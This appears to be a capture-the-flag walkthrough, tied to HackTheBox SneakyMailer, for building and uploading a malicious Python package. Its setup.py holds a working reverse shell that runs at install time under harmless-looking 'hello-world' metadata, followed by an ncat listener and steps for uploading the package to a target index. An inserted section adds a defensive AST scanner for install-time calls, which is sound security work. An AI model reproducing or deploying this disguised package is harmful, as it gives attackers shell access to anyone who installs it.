Evil Python Package Demo

File layout

pypi_evil
├── __init__.py
└── setup.py

Create the malicious setup.py

import setuptools
import socket, subprocess, os

# Reverse shell. This sits at module level, so it runs the moment setup.py is
# interpreted (pip install of the sdist, or any `python3 setup.py ...` command),
# before setuptools.setup() is ever reached.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.100", 8888))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])

# Disguise: ordinary-looking package metadata
setuptools.setup(
    name="hello-world",
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires=">=3.6",
)
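The point of the snippet above is that a source distribution's setup.py is plain Python that runs with the installing user's privileges, so the defender's check is to look at what the module executes unconditionally before ever running it. The scanner below is an added example, not part of the original post: it parses a setup.py with the `ast` module and reports module-level calls into modules that packaging metadata never needs (socket, subprocess, os, ...), dynamic code execution builtins, and a `cmdclass` argument to `setup()`, which is the other common way to hook install. The two embedded setup.py strings are constructed samples (the address is a TEST-NET address); the function and constant names are this example's own.

```python
import ast
import sys

# Modules that legitimate packaging metadata does not need at import time.
# A module-level call into any of them is worth a human look before installing.
SUSPICIOUS_MODULES = {"socket", "subprocess", "os", "shutil", "ctypes",
                      "urllib", "requests", "base64", "codecs", "zlib", "marshal"}
# Builtins that turn strings into executable code (common in obfuscated payloads).
SUSPICIOUS_BUILTINS = {"exec", "eval", "compile", "__import__"}


def _import_aliases(tree):
    """Map every local name bound by an import to its top-level module, so that
    `import os as o` and `from subprocess import call` both resolve correctly."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                top = alias.name.split(".")[0]
                aliases[alias.asname or top] = top
        elif isinstance(node, ast.ImportFrom) and node.module:
            top = node.module.split(".")[0]
            for alias in node.names:
                aliases[alias.asname or alias.name] = top
    return aliases


def _root_name(expr):
    """Leftmost name of an attribute chain: os.path.join -> 'os'."""
    while isinstance(expr, ast.Attribute):
        expr = expr.value
    return expr.id if isinstance(expr, ast.Name) else None


def scan_setup_py(source):
    """Return a list of (lineno, description) for code that executes as soon as
    setup.py is run, i.e. during `pip install` of a source distribution.
    Requires Python 3.9+ for ast.unparse."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    findings = []
    for stmt in tree.body:
        # Function and class bodies only run if something calls them; we skip
        # them here but flag the mechanism that makes setuptools call them.
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        for node in ast.walk(stmt):
            if not isinstance(node, ast.Call):
                continue
            root = _root_name(node.func)
            if root in SUSPICIOUS_BUILTINS:
                findings.append((node.lineno, f"dynamic code execution via {root}()"))
            elif aliases.get(root) in SUSPICIOUS_MODULES:
                findings.append((node.lineno, f"install-time call to {ast.unparse(node.func)}"))
            is_setup = root == "setup" or (
                isinstance(node.func, ast.Attribute) and node.func.attr == "setup")
            if is_setup and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append((node.lineno, "setup() registers custom cmdclass install hooks"))
    return findings


# Constructed sample in the shape of the demo above (hypothetical package, TEST-NET host).
MALICIOUS_SETUP_PY = '''\
import setuptools
import socket, subprocess, os
from setuptools.command.install import install

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
os.dup2(s.fileno(), 0)
subprocess.call(["/bin/sh", "-i"])

class PostInstall(install):
    def run(self):
        install.run(self)

setuptools.setup(name="hello-world", version="0.0.1",
                 cmdclass={"install": PostInstall})
'''

# Constructed benign sample: metadata only, nothing runs besides setup().
BENIGN_SETUP_PY = '''\
from setuptools import setup, find_packages

setup(name="hello-world", version="0.0.1", packages=find_packages())
'''


if __name__ == "__main__":
    # Usage: python scan_setup.py path/to/setup.py  (defaults to the built-in sample)
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else MALICIOUS_SETUP_PY
    for lineno, msg in scan_setup_py(src):
        print(f"line {lineno}: {msg}")
```

This is a heuristic, not a proof of safety: it ignores code reached only through function calls, and a payload that builds module names from string fragments will get past the alias map (the `__import__` check catches the laziest form of that). Two operational caveats matter more than the scanner. First, pip prepares metadata for a source distribution by running its setup.py, so `pip download` is not a safe way to fetch a suspicious sdist; obtain the archive directly and unpack it before scanning. Second, `pip install --only-binary :all:` refuses source distributions outright, which removes the install-time execution channel this demo relies on.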

Test that it runs

# terminal 1: listener
$ ncat -lvnp 8888

# terminal 2: the module-level code fires as soon as the interpreter loads setup.py,
# regardless of which (if any) setuptools command follows
$ python3 setup.py

Create .pypirc

Create a .pypirc so the package can be distributed to the remote server (the target):

[distutils]
index-servers = remote

[remote]
repository = <second-repository URL>
username = <second-repository username>
password = <second-repository password>

Distribute to the remote server

$ python3 setup.py sdist upload -r remote

  • YouTube - IppSec - HackTheBox - SneakyMailer